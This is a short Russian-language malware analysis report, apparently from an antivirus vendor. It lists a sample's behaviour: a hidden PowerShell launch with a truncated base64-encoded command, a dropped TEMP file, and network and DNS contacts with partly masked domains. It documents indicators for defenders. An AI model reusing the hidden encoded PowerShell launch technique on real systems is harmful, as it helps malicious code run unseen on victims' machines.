Техническая информация
Вредоносные функции
Запускает на исполнение (эксплоит)
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -w hidden -en JABVAHAAdwBpAHoAdAB5AGIAPQAnAEUAawBjAGkAYgBuAG4AeAByACcAOwAkAEYAbAB3AGQAZABvAG0AZABzAGMAYgAgAD0AIAAnADUAMAA4ACcAOwAkAFcAZABsAHQAdwB3AGkAcwBmAG8APQAnAFQAaABkAGIAdQBsAGEAbQBoAGYAJwA...
- '%CommonProgramFiles%\Microsoft Shared\DW\DW20.EXE' -x -s 1512
Изменения в файловой системе
Создает следующие файлы
- %TEMP%\1385647.cvr
Сетевая активность
Подключается к
- 'tc##l.com':443
- 'ri###turk.com':443
- 'be###uryre.com':443
TCP
Другие
- 'tc##l.com':443
- 'ri###turk.com':443
- 'be###uryre.com':443
UDP
- DNS ASK tc##l.com
- DNS ASK te###fer.com
- DNS ASK ri###turk.com
- DNS ASK be###uryre.com
- DNS ASK al######irstbuildcon.com
Другое
Создает и запускает на исполнение
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -w hidden -en JABVAHAAdwBpAHoAdAB5AGIAPQAnAEUAawBjAGkAYgBuAG4AeAByACcAOwAkAEYAbAB3AGQAZABvAG0AZABzAGMAYgAgAD0AIAAnADUAMAA4ACcAOwAkAFcAZABsAHQAdwB3AGkAcwBmAG8APQAnAFQAaABkAGIAdQBsAGEAbQBoAGYAJwA...' (со скрытым окном)
